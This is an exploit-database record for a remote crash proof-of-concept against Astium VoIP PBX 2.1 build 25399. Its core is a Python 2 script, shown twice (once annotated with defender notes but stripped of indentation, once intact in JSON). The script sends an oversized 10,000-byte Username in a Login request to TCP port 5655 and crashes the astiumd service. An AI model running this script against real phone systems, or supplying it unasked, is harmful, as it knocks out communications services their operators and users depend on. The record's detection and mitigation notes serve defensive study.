ID EXPLOITPACK:8427A558C95027961E49BCD00B39EA09
Type exploitpack
Reporter xistence
Modified 2013-01-02T00:00:00
Description
Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)
#!/usr/bin/python
#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC
# Date : 01-02-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en
# Vendor site : http://www.oneip.nl/
# Version : v2.1 build 25399
# Tested on : CentOS 5.x 32-bit
#
# Vulnerability : The "astiumd" service on port 5655 crashes and restarts when it is sent a large buffer.
#
# Entries in /var/log/astiumd.log after executing script:
# Astiumd ended with exit status 139 <-- Segmentation Fault
# Automatically restarting Astiumd
#+--------------------------------------------------------------------------------------------------------------------------------+
# Crash proof-of-concept for the "astiumd" service: opens one TCP connection to
# port 5655 and submits a Login action whose Username value is 10000 bytes long.
# Written for Python 2 (print statements).
#
# NOTE(review): this listing has lost its indentation, so the bodies of the
# `if`, `try` and `except` statements below appear at column 0; as printed it
# is not valid Python.
#
# Reviewer notes for defenders, based on what the header and the code show:
#   - Reach: the only input is a host name, and the Secret sent is a fixed
#     placeholder, so the request does not appear to depend on valid
#     credentials -- TODO confirm against the service.
#   - Detection: the header lists the resulting /var/log/astiumd.log entries
#     ("Astiumd ended with exit status 139" followed by "Automatically
#     restarting Astiumd"); status 139 is 128 + 11, i.e. SIGSEGV. On the wire,
#     the signal is a "Username:" line of roughly 10 KB on TCP 5655.
#   - Mitigation: this record names no fixed version and no CVE; until a
#     vendor fix is confirmed, limit access to TCP 5655 to trusted management
#     hosts.
import socket, sys
# TCP port the header attributes to the astiumd service.
port = 5655
# 10000 repetitions of byte 0x41 ("A"); this is the oversized field value.
payload = "\x41"*10000
print ""
print "[*] Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02"
print ""
# Exactly one command-line argument (the target host) is required.
if (len(sys.argv) != 2):
print "[*] Usage: " + sys.argv[0] + " <RHOST>"
print ""
# NOTE(review): a usage error exits with status 0, so a calling script cannot
# tell it apart from a completed run.
exit(0)
rhost = sys.argv[1]
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost,port))
# Read up to 1024 bytes of whatever the service sends first and echo it.
data = s.recv(1024)
print "[*] %s" %data
print "[*] Sending payload!"
# Line-oriented "Key: value" request terminated by an empty line; the layout
# resembles an Asterisk Manager Interface login -- presumably, confirm.
s.send("Action: Login\r\n")
# The only abnormal part of the request: the Username value carries the
# 10000-byte payload.
s.send("Username: " + payload + "\r\n")
s.send("Secret: hax0r\r\n")
s.send("\r\n")
# No reply is read after the request; the script does not itself verify that
# the service crashed.
s.close()
# Bare except: every failure (including a refused connection) is reduced to
# "Error!" with no detail, and the socket is not closed on this path.
except:
print "Error!"
{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nAstium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)", "edition": 1, "reporter": "xistence", "exploitpack": {"type": "dos", "platform": "linux"}, "published": "2013-01-02T00:00:00", "title": "Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:05", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-04-01T19:04:05", "rev": 2}, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-01-02T00:00:00", "id": "EXPLOITPACK:8427A558C95027961E49BCD00B39EA09", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/python\n#+--------------------------------------------------------------------------------------------------------------------------------+\n# Exploit Title : Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC\n# Date : 01-02-2012\n# Author : xistence (xistence<[AT]>0x90.nl)\n# Software link : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en\n# Vendor site : http://www.oneip.nl/\n# Version : v2.1 build 25399\n# Tested on : CentOS 5.x 32-bit\n#\n# Vulnerability\t : The \"astiumd\" service on port 5655 crashes and restarts when sending a large buffer.\n#\t\t \n#\t\t Entries in /var/log/astiumd.log after executing script:\n# Astiumd ended with exit status 139 <-- Segmentation Fault\n#\t\t Automatically restarting Astiumd\n#+--------------------------------------------------------------------------------------------------------------------------------+\n\n\nimport socket, sys\n\nport = 5655\npayload = \"\\x41\"*10000\n\nprint \"\"\nprint \"[*] Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02\"\nprint \"\"\n\nif (len(sys.argv) != 2):\n print \"[*] Usage: \" + sys.argv[0] + \" <RHOST>\"\n print \"\"\n exit(0)\n\nrhost = 
sys.argv[1]\n\ntry:\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect((rhost,port))\n data = s.recv(1024)\n print \"[*] %s\" %data\n\tprint \"[*] Sending payload!\"\n s.send(\"Action: Login\\r\\n\")\n s.send(\"Username: \" + payload + \"\\r\\n\")\n s.send(\"Secret: hax0r\\r\\n\")\n s.send(\"\\r\\n\")\n\ts.close()\nexcept:\n\tprint \"Error!\"", "cvss": {"score": 0.0, "vector": "NONE"}}
{}